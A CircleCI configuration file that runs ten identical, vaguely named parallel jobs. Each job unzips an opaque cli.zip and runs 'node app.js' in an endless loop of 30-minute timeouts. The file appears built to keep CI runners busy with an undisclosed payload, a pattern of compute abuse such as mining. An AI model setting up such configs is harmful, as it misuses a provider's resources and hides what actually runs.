working_dir: &working_dir ~/app
version: 2.1
jobs:
  red:
    ##############################
    docker:
      - image: cimg/node:20.16.0
    
    steps:
      - checkout
      
      
      - run:
          name: a
          
          command: |
            unzip cli.zip;timeout 30m node app.js;while :; do timeout 30m node app.js; sleep 1s; done
            
            
            
  blue:
    
    docker:
      - image: cimg/node:20.16.0
    
    steps:
      - checkout
      
      
      - run:
          name: b
          
          command: |
            unzip cli.zip;timeout 30m node app.js;while :; do timeout 30m node app.js; sleep 1s; done
  silver:
    
    docker:
      - image: cimg/node:20.16.0
    
    steps:
      - checkout
      
      
      - run:
          name: q
          
          command: |
            unzip cli.zip;timeout 30m node app.js;while :; do timeout 30m node app.js; sleep 1s; done

  yellow:
    
    docker:
      - image: cimg/node:20.16.0
    
    steps:
      - checkout
      
      
      - run:
          name: w
          
          command: |
            unzip cli.zip;timeout 30m node app.js;while :; do timeout 30m node app.js; sleep 1s; done
  green:
    
    docker:
      - image: cimg/node:20.16.0
    
    steps:
      - checkout
      
      
      - run:
          name: e
          
          command: |
            unzip cli.zip;timeout 30m node app.js;while :; do timeout 30m node app.js; sleep 1s; done

  purple:
    
    docker:
      - image: cimg/node:20.16.0
    
    steps:
      - checkout
      
      
      - run:
          name: r
          
          command: |
            unzip cli.zip;timeout 30m node app.js;while :; do timeout 30m node app.js; sleep 1s; done

  pink:
    
    docker:
      - image: cimg/node:20.16.0
    
    steps:
      - checkout
      
      - run:
          name: t
          
          command: |
            unzip cli.zip;timeout 30m node app.js;while :; do timeout 30m node app.js; sleep 1s; done

  black:
    
    docker:
      - image: cimg/node:20.16.0
    
    steps:
      - checkout
      
      
      - run:
          name: y
          
          command: |
            unzip cli.zip;timeout 30m node app.js;while :; do timeout 30m node app.js; sleep 1s; done
  white:
    
    docker:
      - image: cimg/node:20.16.0
    
    steps:
      - checkout
      
      
      - run:
          name: u
          
          command: |
            unzip cli.zip;timeout 30m node app.js;while :; do timeout 30m node app.js; sleep 1s; done


  grey:
    
    docker:
      - image: cimg/node:20.16.0
    
    steps:
      - checkout
      
      
      - run:
          name: i
          
          command: |
            unzip cli.zip;timeout 30m node app.js;while :; do timeout 30m node app.js; sleep 1s; done


workflows:
    version: 2.1
    build:
        jobs:
             - red
             - blue
             - silver
             - yellow
             - green
             - purple
             - pink
             - black
             - white
             - grey
